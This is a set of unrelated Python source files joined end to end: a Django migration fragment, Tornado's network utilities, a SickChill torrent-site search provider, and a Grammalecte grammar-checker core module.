            field=models.CharField(default='Magins namn', max_length=256, verbose_name='Namn'),
        ),
        migrations.AlterField(
            model_name='spellinfo',
            name='parent',
            field=models.ForeignKey(verbose_name='Tillh\xf6righet', to='characters.SpellParent'),
        ),
        migrations.AddField(
            model_name='characterspells',
            name='spells',
            field=models.ManyToManyField(to='characters.SpellInfo', verbose_name='Magier och besv\xe4rjelser'),
        ),
    ]

#!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""Miscellaneous network utility code."""

from __future__ import absolute_import, division, print_function, with_statement

import errno
import os
import re
import socket
import ssl
import stat

from lib.tornado.concurrent import dummy_executor, run_on_executor
from lib.tornado.ioloop import IOLoop
from lib.tornado.platform.auto import set_close_exec
from lib.tornado.util import Configurable


def bind_sockets(port, address=None, family=socket.AF_UNSPEC, backlog=128, flags=None):
    """Creates listening sockets bound to the given port and address.

    Returns a list of socket objects (multiple sockets are returned if
    the given address maps to multiple IP addresses, which is most common
    for mixed IPv4 and IPv6 use).

    Address may be either an IP address or hostname.  If it's a hostname,
    the server will listen on all IP addresses associated with the
    name.  Address may be an empty string or None to listen on all
    available interfaces.  Family may be set to either `socket.AF_INET`
    or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
    both will be used if available.

    The ``backlog`` argument has the same meaning as for
    `socket.listen() <socket.socket.listen>`.

    ``flags`` is a bitmask of AI_* flags to `~socket.getaddrinfo`, like
    ``socket.AI_PASSIVE | socket.AI_NUMERICHOST``.
    """
    sockets = []
    if address == "":
        address = None
    if not socket.has_ipv6 and family == socket.AF_UNSPEC:
        # Python can be compiled with --disable-ipv6, which causes
        # operations on AF_INET6 sockets to fail, but does not
        # automatically exclude those results from getaddrinfo
        # results.
        # http://bugs.python.org/issue16208
        family = socket.AF_INET
    if flags is None:
        flags = socket.AI_PASSIVE
    for res in set(socket.getaddrinfo(address, port, family, socket.SOCK_STREAM,
                                      0, flags)):
        af, socktype, proto, canonname, sockaddr = res
        sock = socket.socket(af, socktype, proto)
        set_close_exec(sock.fileno())
        if os.name != 'nt':
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        if af == socket.AF_INET6:
            # On linux, ipv6 sockets accept ipv4 too by default,
            # but this makes it impossible to bind to both
            # 0.0.0.0 in ipv4 and :: in ipv6.  On other systems,
            # separate sockets *must* be used to listen for both ipv4
            # and ipv6.  For consistency, always disable ipv4 on our
            # ipv6 sockets and use a separate ipv4 socket when needed.
            #
            # Python 2.x on windows doesn't have IPPROTO_IPV6.
            if hasattr(socket, "IPPROTO_IPV6"):
                sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
        sock.setblocking(0)
        sock.bind(sockaddr)
        sock.listen(backlog)
        sockets.append(sock)
    return sockets

if hasattr(socket, 'AF_UNIX'):
    def bind_unix_socket(file, mode=0o600, backlog=128):
        """Creates a listening unix socket.

        If a socket with the given name already exists, it will be deleted.
        If any other file with that name exists, an exception will be
        raised.

        Returns a socket object (not a list of socket objects like
        `bind_sockets`)
        """
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        set_close_exec(sock.fileno())
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setblocking(0)
        try:
            st = os.stat(file)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
        else:
            if stat.S_ISSOCK(st.st_mode):
                os.remove(file)
            else:
                raise ValueError("File %s exists and is not a socket", file)
        sock.bind(file)
        os.chmod(file, mode)
        sock.listen(backlog)
        return sock


def add_accept_handler(sock, callback, io_loop=None):
    """Adds an `.IOLoop` event handler to accept new connections on ``sock``.

    When a connection is accepted, ``callback(connection, address)`` will
    be run (``connection`` is a socket object, and ``address`` is the
    address of the other end of the connection).  Note that this signature
    is different from the ``callback(fd, events)`` signature used for
    `.IOLoop` handlers.
    """
    if io_loop is None:
        io_loop = IOLoop.current()

    def accept_handler(fd, events):
        while True:
            try:
                connection, address = sock.accept()
            except socket.error as e:
                if e.args[0] in (errno.EWOULDBLOCK, errno.EAGAIN):
                    return
                raise
            callback(connection, address)
    io_loop.add_handler(sock.fileno(), accept_handler, IOLoop.READ)


def is_valid_ip(ip):
    """Returns true if the given string is a well-formed IP address.

    Supports IPv4 and IPv6.
    """
    try:
        res = socket.getaddrinfo(ip, 0, socket.AF_UNSPEC,
                                 socket.SOCK_STREAM,
                                 0, socket.AI_NUMERICHOST)
        return bool(res)
    except socket.gaierror as e:
        if e.args[0] == socket.EAI_NONAME:
            return False
        raise
    return True


class Resolver(Configurable):
    """Configurable asynchronous DNS resolver interface.

    By default, a blocking implementation is used (which simply calls
    `socket.getaddrinfo`).  An alternative implementation can be
    chosen with the `Resolver.configure <.Configurable.configure>`
    class method::

        Resolver.configure('tornado.netutil.ThreadedResolver')

    The implementations of this interface included with Tornado are

    * `tornado.netutil.BlockingResolver`
    * `tornado.netutil.ThreadedResolver`
    * `tornado.netutil.OverrideResolver`
    * `tornado.platform.twisted.TwistedResolver`
    * `tornado.platform.caresresolver.CaresResolver`
    """
    @classmethod
    def configurable_base(cls):
        return Resolver

    @classmethod
    def configurable_default(cls):
        return BlockingResolver

    def resolve(self, host, port, family=socket.AF_UNSPEC, callback=None):
        """Resolves an address.

        The ``host`` argument is a string which may be a hostname or a
        literal IP address.

        Returns a `.Future` whose result is a list of (family,
        address) pairs, where address is a tuple suitable to pass to
        `socket.connect <socket.socket.connect>` (i.e. a ``(host,
        port)`` pair for IPv4; additional fields may be present for
        IPv6). If a ``callback`` is passed, it will be run with the
        result as an argument when it is complete.
        """
        raise NotImplementedError()


class ExecutorResolver(Resolver):
    def initialize(self, io_loop=None, executor=None):
        self.io_loop = io_loop or IOLoop.current()
        self.executor = executor or dummy_executor

    @run_on_executor
    def resolve(self, host, port, family=socket.AF_UNSPEC):
        addrinfo = socket.getaddrinfo(host, port, family)
        results = []
        for family, socktype, proto, canonname, address in addrinfo:
            results.append((family, address))
        return results


class BlockingResolver(ExecutorResolver):
    """Default `Resolver` implementation, using `socket.getaddrinfo`.

    The `.IOLoop` will be blocked during the resolution, although the
    callback will not be run until the next `.IOLoop` iteration.
    """
    def initialize(self, io_loop=None):
        super(BlockingResolver, self).initialize(io_loop=io_loop)


class ThreadedResolver(ExecutorResolver):
    """Multithreaded non-blocking `Resolver` implementation.

    Requires the `concurrent.futures` package to be installed
    (available in the standard library since Python 3.2,
    installable with ``pip install futures`` in older versions).

    The thread pool size can be configured with::

        Resolver.configure('tornado.netutil.ThreadedResolver',
                           num_threads=10)
    """
    def initialize(self, io_loop=None, num_threads=10):
        from concurrent.futures import ThreadPoolExecutor
        super(ThreadedResolver, self).initialize(
            io_loop=io_loop, executor=ThreadPoolExecutor(num_threads))


class OverrideResolver(Resolver):
    """Wraps a resolver with a mapping of overrides.

    This can be used to make local DNS changes (e.g. for testing)
    without modifying system-wide settings.

    The mapping can contain either host strings or host-port pairs.
    """
    def initialize(self, resolver, mapping):
        self.resolver = resolver
        self.mapping = mapping

    def resolve(self, host, port, *args, **kwargs):
        if (host, port) in self.mapping:
            host, port = self.mapping[(host, port)]
        elif host in self.mapping:
            host = self.mapping[host]
        return self.resolver.resolve(host, port, *args, **kwargs)


# These are the keyword arguments to ssl.wrap_socket that must be translated
# to their SSLContext equivalents (the other arguments are still passed
# to SSLContext.wrap_socket).
_SSL_CONTEXT_KEYWORDS = frozenset(['ssl_version', 'certfile', 'keyfile',
                                   'cert_reqs', 'ca_certs', 'ciphers'])


def ssl_options_to_context(ssl_options):
    """Try to convert an ``ssl_options`` dictionary to an
    `~ssl.SSLContext` object.

    The ``ssl_options`` dictionary contains keywords to be passed to
    `ssl.wrap_socket`.  In Python 3.2+, `ssl.SSLContext` objects can
    be used instead.  This function converts the dict form to its
    `~ssl.SSLContext` equivalent, and may be used when a component which
    accepts both forms needs to upgrade to the `~ssl.SSLContext` version
    to use features like SNI or NPN.
    """
    if isinstance(ssl_options, dict):
        assert all(k in _SSL_CONTEXT_KEYWORDS for k in ssl_options), ssl_options
    if (not hasattr(ssl, 'SSLContext') or
            isinstance(ssl_options, ssl.SSLContext)):
        return ssl_options
    context = ssl.SSLContext(
        ssl_options.get('ssl_version', ssl.PROTOCOL_SSLv23))
    if 'certfile' in ssl_options:
        context.load_cert_chain(ssl_options['certfile'], ssl_options.get('keyfile', None))
    if 'cert_reqs' in ssl_options:
        context.verify_mode = ssl_options['cert_reqs']
    if 'ca_certs' in ssl_options:
        context.load_verify_locations(ssl_options['ca_certs'])
    if 'ciphers' in ssl_options:
        context.set_ciphers(ssl_options['ciphers'])
    return context


def ssl_wrap_socket(socket, ssl_options, server_hostname=None, **kwargs):
    """Returns an ``ssl.SSLSocket`` wrapping the given socket.

    ``ssl_options`` may be either a dictionary (as accepted by
    `ssl_options_to_context`) or an `ssl.SSLContext` object.
    Additional keyword arguments are passed to ``wrap_socket``
    (either the `~ssl.SSLContext` method or the `ssl` module function
    as appropriate).
    """
    context = ssl_options_to_context(ssl_options)
    if hasattr(ssl, 'SSLContext') and isinstance(context, ssl.SSLContext):
        if server_hostname is not None and getattr(ssl, 'HAS_SNI'):
            # Python doesn't have server-side SNI support so we can't
            # really unittest this, but it can be manually tested with
            # python3.2 -m tornado.httpclient https://sni.velox.ch
            return context.wrap_socket(socket, server_hostname=server_hostname,
                                       **kwargs)
        else:
            return context.wrap_socket(socket, **kwargs)
    else:
        return ssl.wrap_socket(socket, **dict(context, **kwargs))

if hasattr(ssl, 'match_hostname'):  # python 3.2+
    ssl_match_hostname = ssl.match_hostname
    SSLCertificateError = ssl.CertificateError
else:
    # match_hostname was added to the standard library ssl module in python 3.2.
    # The following code was backported for older releases and copied from
    # https://bitbucket.org/brandon/backports.ssl_match_hostname
    class SSLCertificateError(ValueError):
        pass

    def _dnsname_to_pat(dn):
        pats = []
        for frag in dn.split(r'.'):
            if frag == '*':
                # When '*' is a fragment by itself, it matches a non-empty dotless
                # fragment.
                pats.append('[^.]+')
            else:
                # Otherwise, '*' matches any dotless fragment.
                frag = re.escape(frag)
                pats.append(frag.replace(r'\*', '[^.]*'))
        return re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)

    def ssl_match_hostname(cert, hostname):
        """Verify that *cert* (in decoded format as returned by
        SSLSocket.getpeercert()) matches the *hostname*.  RFC 2818 rules
        are mostly followed, but IP addresses are not accepted for *hostname*.

        CertificateError is raised on failure. On success, the function
        returns nothing.
        """
        if not cert:
            raise ValueError("empty or no certificate")
        dnsnames = []
        san = cert.get('subjectAltName', ())
        for key, value in san:
            if key == 'DNS':
                if _dnsname_to_pat(value).match(hostname):
                    return
                dnsnames.append(value)
        if not san:
            # The subject is only checked when subjectAltName is empty
            for sub in cert.get('subject', ()):
                for key, value in sub:
                    # XXX according to RFC 2818, the most specific Common Name
                    # must be used.
                    if key == 'commonName':
                        if _dnsname_to_pat(value).match(hostname):
                            return
                        dnsnames.append(value)
        if len(dnsnames) > 1:
            raise SSLCertificateError("hostname %r "
                                      "doesn't match either of %s"
                                      % (hostname, ', '.join(map(repr, dnsnames))))
        elif len(dnsnames) == 1:
            raise SSLCertificateError("hostname %r "
                                      "doesn't match %r"
                                      % (hostname, dnsnames[0]))
        else:
            raise SSLCertificateError("no appropriate commonName or "
                                      "subjectAltName fields were found")

import re
import traceback
from urllib.parse import quote

from requests.utils import dict_from_cookiejar

from sickchill import logger
from sickchill.helper.common import convert_size, try_int
from sickchill.oldbeard import tvcache
from sickchill.oldbeard.bs4_parser import BS4Parser
from sickchill.providers.torrent.TorrentProvider import TorrentProvider


class Provider(TorrentProvider):
    def __init__(self):

        super().__init__("Pretome")

        self.username = None
        self.password = None
        self.pin = None
        self.minseed = 0
        self.minleech = 0

        self.urls = {
            "base_url": "https://pretome.info",
            "login": "https://pretome.info/takelogin.php",
            "detail": "https://pretome.info/details.php?id=%s",
            "search": "https://pretome.info/browse.php?search=%s%s",
            "download": "https://pretome.info/download.php/%s/%s.torrent",
        }

        self.url = self.urls["base_url"]

        self.categories = "&st=1&cat%5B%5D=7"

        self.proper_strings = ["PROPER", "REPACK"]

        self.cache = tvcache.TVCache(self)

    def _check_auth(self):

        if not self.username or not self.password or not self.pin:
            logger.warning("Invalid username or password or pin. Check your settings")

        return True

    def login(self):
        if any(dict_from_cookiejar(self.session.cookies).values()):
            return True

        login_params = {"username": self.username, "password": self.password, "login_pin": self.pin}

        response = self.get_url(self.urls["login"], post_data=login_params, returns="text")
        if not response:
            logger.warning("Unable to connect to provider")
            return False

        if re.search("Username or password incorrect", response):
            logger.warning("Invalid username or password. Check your settings")
            return False

        return True

    def search(self, search_params, age=0, ep_obj=None):
        results = []
        if not self.login():
            return results

        for mode in search_params:
            items = []
            logger.debug(_("Search Mode: {mode}".format(mode=mode)))
            for search_string in search_params[mode]:

                if mode != "RSS":
                    logger.debug(_("Search String: {search_string}".format(search_string=search_string)))

                search_url = self.urls["search"] % (quote(search_string), self.categories)

                data = self.get_url(search_url, returns="text")
                if not data:
                    continue

                try:
                    with BS4Parser(data, "html5lib") as html:
                        # Continue only if one Release is found
                        empty = html.find("h2", text="No .torrents fit this filter criteria")
                        if empty:
                            logger.debug("Data returned from provider does not contain any torrents")
                            continue

                        torrent_table = html.find("table", style="border: none; width: 100%;")
                        if not torrent_table:
                            logger.exception("Could not find table of torrents")
                            continue

                        torrent_rows = torrent_table("tr", class_="browse")

                        for result in torrent_rows:
                            cells = result("td")
                            size = None
                            link = cells[1].find("a", style="font-size: 1.25em; font-weight: bold;")

                            torrent_id = link["href"].replace("details.php?id=", "")

                            try:
                                if link.get("title", ""):
                                    title = link["title"]
                                else:
                                    title = link.contents[0]

                                download_url = self.urls["download"] % (torrent_id, link.contents[0])
                                seeders = int(cells[9].contents[0])
                                leechers = int(cells[10].contents[0])

                                # Need size for failed downloads handling
                                if size is None:
                                    torrent_size = cells[7].text
                                    size = convert_size(torrent_size) or -1

                            except (AttributeError, TypeError):
                                continue

                            if not all([title, download_url]):
                                continue

                            # Filter unseeded torrent
                            if seeders < self.minseed or leechers < self.minleech:
                                if mode != "RSS":
                                    logger.debug(
                                        "Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(
                                            title, seeders, leechers
                                        )
                                    )
                                continue

                            item = {"title": title, "link": download_url, "size": size, "seeders": seeders, "leechers": leechers, "hash": ""}
                            if mode != "RSS":
                                logger.debug("Found result: {0} with {1} seeders and {2} leechers".format(title, seeders, leechers))

                            items.append(item)

                except Exception:
                    logger.exception("Failed parsing provider. Traceback: {0}".format(traceback.format_exc()))

            # For each search mode sort all the items by seeders if available
            items.sort(key=lambda d: try_int(d.get("seeders", 0)), reverse=True)

            results += items

        return results

# -*- encoding: UTF-8 -*-

import re
import sys
import os
import traceback

from ..ibdawg import IBDAWG
from ..echo import echo
from . import gc_options


__all__ = [ "lang", "locales", "pkg", "name", "version", "author", \
            "load", "parse", "getDictionary", \
            "setOptions", "getOptions", "getOptionsLabels", "resetOptions", \
            "ignoreRule", "resetIgnoreRules" ]

__version__ = u"${version}"


lang = u"${lang}"
locales = ${loc}
pkg = u"${implname}"
name = u"${name}"
version = u"${version}"
author = u"${author}"

# commons regexes
_zEndOfSentence = re.compile(u'([.?!:;…][ .?!… »”")]*|.$)')
_zBeginOfParagraph = re.compile(u"^\W*")
_zEndOfParagraph = re.compile(u"\W*$")
_zNextWord = re.compile(u" +(\w[\w-]*)")
_zPrevWord = re.compile(u"(\w[\w-]*) +$")

# grammar rules and dictionary
_rules = None
_dOptions = dict(gc_options.dOpt)       # duplication necessary, to be able to reset to default
_aIgnoredRules = set()
_oDict = None
_dAnalyses = {}                         # cache for data from dictionary

_GLOBALS = globals()


#### Parsing

def parse (sText, sCountry="${country_default}", bDebug=False, dOptions=None):
    "analyses the paragraph sText and returns list of errors"
    aErrors = None
    sAlt = sText
    dDA = {}
    dOpt = _dOptions  if not dOptions  else dOptions

    # parse paragraph
    try:
        sNew, aErrors = _proofread(sText, sAlt, 0, True, dDA, sCountry, dOpt, bDebug)
        if sNew:
            sText = sNew
    except:
        raise

    # parse sentences
    for iStart, iEnd in _getSentenceBoundaries(sText):
        if 4 < (iEnd - iStart) < 2000:
            dDA.clear()
            try:
                _, errs = _proofread(sText[iStart:iEnd], sAlt[iStart:iEnd], iStart, False, dDA, sCountry, dOpt, bDebug)
                aErrors.extend(errs)
            except:
                raise
    return aErrors


def _getSentenceBoundaries (sText):
    iStart = _zBeginOfParagraph.match(sText).end()
    for m in _zEndOfSentence.finditer(sText):
        yield (iStart, m.end())
        iStart = m.end()


def _proofread (s, sx, nOffset, bParagraph, dDA, sCountry, dOptions, bDebug):
    aErrs = []
    bChange = False
    
    if not bParagraph:
        # after the first pass, we modify automatically some characters
        if u" " in s:
            s = s.replace(u" ", u' ') # nbsp
            bChange = True
        if u" " in s:
            s = s.replace(u" ", u' ') # nnbsp
            bChange = True
        if u"@" in s:
            s = s.replace(u"@", u' ')
            bChange = True
        if u"'" in s:
            s = s.replace(u"'", u"’")
            bChange = True
        if u"‑" in s:
            s = s.replace(u"‑", u"-") # nobreakdash
            bChange = True

    bIdRule = option('idrule')

    for sOption, lRuleGroup in _getRules(bParagraph):
        if not sOption or dOptions.get(sOption, False):
            for zRegex, bUppercase, sRuleId, lActions in lRuleGroup:
                if sRuleId not in _aIgnoredRules:
                    for m in zRegex.finditer(s):
                        for sFuncCond, cActionType, sWhat, *eAct in lActions:
                            # action in lActions: [ condition, action type, replacement/suggestion/action[, iGroup[, message, URL]] ]
                            try:
                                if not sFuncCond or _GLOBALS[sFuncCond](s, sx, m, dDA, sCountry):
                                    if cActionType == "-":
                                        # grammar error
                                        # (text, replacement, nOffset, m, iGroup, sId, bUppercase, sURL, bIdRule)
                                        aErrs.append(_createError(s, sWhat, nOffset, m, eAct[0], sRuleId, bUppercase, eAct[1], eAct[2], bIdRule, sOption))
                                    elif cActionType == "~":
                                        # text processor
                                        s = _rewrite(s, sWhat, eAct[0], m, bUppercase)
                                        bChange = True
                                        if bDebug:
                                            echo(u"~ " + s + "  -- " + m.group(eAct[0]) + "  # " + sRuleId)
                                    elif cActionType == "=":
                                        # disambiguation
                                        _GLOBALS[sWhat](s, m, dDA)
                                        if bDebug:
                                            echo(u"= " + m.group(0) + "  # " + sRuleId + "\nDA: " + str(dDA))
                                    else:
                                        echo("# error: unknown action at " + sRuleId)
                            except Exception as e:
                                raise Exception(str(e), sRuleId)
    if bChange:
        return (s, aErrs)
    return (False, aErrs)


def _createWriterError (s, sRepl, nOffset, m, iGroup, sId, bUppercase, sMsg, sURL, bIdRule, sOption):
    "error for Writer (LO/OO)"
    xErr = SingleProofreadingError()
    #xErr = uno.createUnoStruct( "com.sun.star.linguistic2.SingleProofreadingError" )
    xErr.nErrorStart        = nOffset + m.start(iGroup)
    xErr.nErrorLength       = m.end(iGroup) - m.start(iGroup)
    xErr.nErrorType         = PROOFREADING
    xErr.aRuleIdentifier    = sId
    # suggestions
    if sRepl[0:1] == "=":
        sugg = _GLOBALS[sRepl[1:]](s, m)
        if sugg:
            if bUppercase and m.group(iGroup)[0:1].isupper():
                xErr.aSuggestions = tuple(map(str.capitalize, sugg.split("|")))
            else:
                xErr.aSuggestions = tuple(sugg.split("|"))
        else:
            xErr.aSuggestions = ()
    elif sRepl == "_":
        xErr.aSuggestions = ()
    else:
        if bUppercase and m.group(iGroup)[0:1].isupper():
            xErr.aSuggestions = tuple(map(str.capitalize, m.expand(sRepl).split("|")))
        else:
            xErr.aSuggestions = tuple(m.expand(sRepl).split("|"))
    # Message
    if sMsg[0:1] == "=":
        sMessage = _GLOBALS[sMsg[1:]](s, m)
    else:
        sMessage = m.expand(sMsg)
    xErr.aShortComment      = sMessage   # sMessage.split("|")[0]     # in context menu
    xErr.aFullComment       = sMessage   # sMessage.split("|")[-1]    # in dialog
    if bIdRule:
        xErr.aShortComment += "  # " + sId
    # URL
    if sURL:
        p = PropertyValue()
        p.Name = "FullCommentURL"
        p.Value = sURL
        xErr.aProperties    = (p,)
    else:
        xErr.aProperties    = ()
    return xErr


def _createDictError (s, sRepl, nOffset, m, iGroup, sId, bUppercase, sMsg, sURL, bIdRule, sOption):
    "error as a dictionary"
    dErr = {}
    dErr["nStart"]          = nOffset + m.start(iGroup)
    dErr["nEnd"]            = nOffset + m.end(iGroup)
    dErr["sRuleId"]         = sId
    dErr["sType"]           = sOption  if sOption  else "notype"
    # suggestions
    if sRepl[0:1] == "=":
        sugg = _GLOBALS[sRepl[1:]](s, m)
        if sugg:
            if bUppercase and m.group(iGroup)[0:1].isupper():
                dErr["aSuggestions"] = list(map(str.capitalize, sugg.split("|")))
            else:
                dErr["aSuggestions"] = sugg.split("|")
        else:
            dErr["aSuggestions"] = ()
    elif sRepl == "_":
        dErr["aSuggestions"] = ()
    else:
        if bUppercase and m.group(iGroup)[0:1].isupper():
            dErr["aSuggestions"] = list(map(str.capitalize, m.expand(sRepl).split("|")))
        else:
            dErr["aSuggestions"] = m.expand(sRepl).split("|")
    # Message
    if sMsg[0:1] == "=":
        sMessage = _GLOBALS[sMsg[1:]](s, m)
    else:
        sMessage = m.expand(sMsg)
    dErr["sMessage"]      = sMessage
    if bIdRule:
        dErr["sMessage"] += "  # " + sId
    # URL
    dErr["URL"] = sURL  if sURL  else ""
    return dErr


def _rewrite (s, sRepl, iGroup, m, bUppercase):
    "text processor: write sRepl in s at iGroup position"
    ln = m.end(iGroup) - m.start(iGroup)
    if sRepl == "*":
        sNew = " " * ln
    elif sRepl == ">" or sRepl == "_" or sRepl == u"~":
        sNew = sRepl + " " * (ln-1)
    elif sRepl == "@":
        sNew = "@" * ln
    elif sRepl[0:1] == "=":
        if sRepl[1:2] != "@":
            sNew = _GLOBALS[sRepl[1:]](s, m)
            sNew = sNew + " " * (ln-len(sNew))
        else:
            sNew = _GLOBALS[sRepl[2:]](s, m)
            sNew = sNew + "@" * (ln-len(sNew))
        if bUppercase and m.group(iGroup)[0:1].isupper():
            sNew = sNew.capitalize()
    else:
        sNew = m.expand(sRepl)
        sNew = sNew + " " * (ln-len(sNew))
    return s[0:m.start(iGroup)] + sNew + s[m.end(iGroup):]


def ignoreRule (sId):
    _aIgnoredRules.add(sId)


def resetIgnoreRules ():
    _aIgnoredRules.clear()


#### init

try:
    # LibreOffice / OpenOffice
    from com.sun.star.linguistic2 import SingleProofreadingError
    from com.sun.star.text.TextMarkupType import PROOFREADING
    from com.sun.star.beans import PropertyValue
    #import lightproof_handler_${implname} as opt
    _createError = _createWriterError
except ImportError:
    _createError = _createDictError


def load ():
    global _oDict
    try:
        _oDict = IBDAWG("${binary_dic}")
    except:
        traceback.print_exc()


def setOptions (dOpt):
    _dOptions.update(dOpt)


def getOptions ():
    return _dOptions


def getOptionsLabels (sLang):
    return gc_options.getUI(sLang)


def resetOptions ():
    global _dOptions
    _dOptions = dict(gc_options.dOpt)


def getDictionary ():
    return _oDict


def _getRules (bParagraph):
    try:
        if not bParagraph:
            return _rules.lSentenceRules
        return _rules.lParagraphRules
    except:
        _loadRules()
    if not bParagraph:
        return _rules.lSentenceRules
    return _rules.lParagraphRules


def _loadRules2 ():
    from itertools import chain
    from . import gc_rules
    global _rules
    _rules = gc_rules
    # compile rules regex
    for rule in chain(_rules.lParagraphRules, _rules.lSentenceRules):
        try:
            rule[1] = re.compile(rule[1])
        except:
            echo("Bad regular expression in # " + str(rule[3]))
            rule[1] = "(?i)<Grammalecte>"


def _loadRules ():
    from itertools import chain
    from . import gc_rules
    global _rules
    _rules = gc_rules
    # compile rules regex
    for rulegroup in chain(_rules.lParagraphRules, _rules.lSentenceRules):
        for rule in rulegroup[1]:
            try:
                rule[0] = re.compile(rule[0])
            except:
                echo("Bad regular expression in # " + str(rule[2]))
                rule[0] = "(?i)<Grammalecte>"


def _getPath ():
    return os.path.join(os.path.dirname(sys.modules[__name__].__file__), __name__ + ".py")



#### common functions

def option (sOpt):
    "return True if option sOpt is active"
    return _dOptions.get(sOpt, False)


def displayInfo (dDA, tWord):
    "for debugging: retrieve info of word"
    if not tWord:
        echo("> nothing to find")
        return True
    if tWord[1] not in _dAnalyses and not _storeMorphFromFSA(tWord[1]):
        echo("> not in FSA")
        return True
    if tWord[0] in dDA:
        echo("DA: " + str(dDA[tWord[0]]))
    echo("FSA: " + str(_dAnalyses[tWord[1]]))
    return True


def _storeMorphFromFSA (sWord):
    "retrieves morphologies list from _oDict -> _dAnalyses"
    global _dAnalyses
    _dAnalyses[sWord] = _oDict.getMorph(sWord)
    return True  if _dAnalyses[sWord]  else False


def morph (dDA, tWord, sPattern, bStrict=True, bNoWord=False):
    "analyse a tuple (position, word), return True if sPattern in morphologies (disambiguation on)"
    if not tWord:
        return bNoWord
    if tWord[1] not in _dAnalyses and not _storeMorphFromFSA(tWord[1]):
        return False
    lMorph = dDA[tWord[0]]  if tWord[0] in dDA  else _dAnalyses[tWord[1]]
    if not lMorph:
        return False
    p = re.compile(sPattern)
    if bStrict:
        return all(p.search(s)  for s in lMorph)
    return any(p.search(s)  for s in lMorph)


def morphex (dDA, tWord, sPattern, sNegPattern, bNoWord=False):
    "analyse a tuple (position, word), returns True if not sNegPattern in word morphologies and sPattern in word morphologies (disambiguation on)"
    if not tWord:
        return bNoWord
    if tWord[1] not in _dAnalyses and not _storeMorphFromFSA(tWord[1]):
        return False
    lMorph = dDA[tWord[0]]  if tWord[0] in dDA  else _dAnalyses[tWord[1]]
    # check negative condition
    np = re.compile(sNegPattern)
    if any(np.search(s)  for s in lMorph):
        return False
    # search sPattern
    p = re.compile(sPattern)
    return any(p.search(s)  for s in lMorph)


def analyse (sWord, sPattern, bStrict=True):
    "analyse a word, return True if sPattern in morphologies (disambiguation off)"
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return False
    if not _dAnalyses[sWord]:
        return False
    p = re.compile(sPattern)
    if bStrict:
        return all(p.search(s)  for s in _dAnalyses[sWord])
    return any(p.search(s)  for s in _dAnalyses[sWord])


def analysex (sWord, sPattern, sNegPattern):
    "analyse a word, returns True if not sNegPattern in word morphologies and sPattern in word morphologies (disambiguation off)"
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return False
    # check negative condition
    np = re.compile(sNegPattern)
    if any(np.search(s)  for s in _dAnalyses[sWord]):
        return False
    # search sPattern
    p = re.compile(sPattern)
    return any(p.search(s)  for s in _dAnalyses[sWord])


def stem (sWord):
    "returns a list of sWord's stems"
    if not sWord:
        return []
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return []
    return [ s[1:s.find(" ")]  for s in _dAnalyses[sWord] ]


## functions to get text outside pattern scope

# warning: check compile_rules.py to understand how it works

def nextword (s, iStart, n):
    "get the nth word of the input string or empty string"
    m = re.match(u"( +[\\w%-]+){" + str(n-1) + u"} +([\\w%-]+)", s[iStart:])
    if not m:
        return None
    return (iStart+m.start(2), m.group(2))


def prevword (s, iEnd, n):
    "get the (-)nth word of the input string or empty string"
    m = re.search(u"([\\w%-]+) +([\\w%-]+ +){" + str(n-1) + u"}$", s[:iEnd])
    if not m:
        return None
    return (m.start(1), m.group(1))


def nextword1 (s, iStart):
    "get next word (optimization)"
    m = _zNextWord.match(s[iStart:])
    if not m:
        return None
    return (iStart+m.start(1), m.group(1))


def prevword1 (s, iEnd):
    "get previous word (optimization)"
    m = _zPrevWord.search(s[:iEnd])
    if not m:
        return None
    return (m.start(1), m.group(1))


def look (s, sPattern, sNegPattern=None):
    "seek sPattern in s (before/after/fulltext), if sNegPattern not in s"
    if sNegPattern and re.search(sNegPattern, s):
        return False
    if re.search(sPattern, s):
        return True
    return False


def look_chk1 (dDA, s, nOffset, sPattern, sPatternGroup1, sNegPatternGroup1=None):
    "returns True if s has pattern sPattern and m.group(1) has pattern sPatternGroup1"
    m = re.search(sPattern, s)
    if not m:
        return False
    try:
        sWord = m.group(1)
        nPos = m.start(1) + nOffset
    except:
        #print("Missing group 1")
        return False
    if sNegPatternGroup1:
        return morphex(dDA, (nPos, sWord), sPatternGroup1, sNegPatternGroup1)
    return morph(dDA, (nPos, sWord), sPatternGroup1, False)


#### Disambiguator

def select (dDA, nPos, sWord, sPattern, lDefault=None):
    if not sWord:
        return True
    if nPos in dDA:
        return True
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return True
    if len(_dAnalyses[sWord]) == 1:
        return True
    lSelect = [ sMorph  for sMorph in _dAnalyses[sWord]  if re.search(sPattern, sMorph) ]
    if lSelect:
        if len(lSelect) != len(_dAnalyses[sWord]):
            dDA[nPos] = lSelect
            #echo("= "+sWord+" "+str(dDA.get(nPos, "null")))
    elif lDefault:
        dDA[nPos] = lDefault
        #echo("= "+sWord+" "+str(dDA.get(nPos, "null")))
    return True


def exclude (dDA, nPos, sWord, sPattern, lDefault=None):
    if not sWord:
        return True
    if nPos in dDA:
        return True
    if sWord not in _dAnalyses and not _storeMorphFromFSA(sWord):
        return True
    if len(_dAnalyses[sWord]) == 1:
        return True
    lSelect = [ sMorph  for sMorph in _dAnalyses[sWord]  if not re.search(sPattern, sMorph) ]
    if lSelect:
        if len(lSelect) != len(_dAnalyses[sWord]):
            dDA[nPos] = lSelect
            #echo("= "+sWord+" "+str(dDA.get(nPos, "null")))
    elif lDefault:
        dDA[nPos] = lDefault
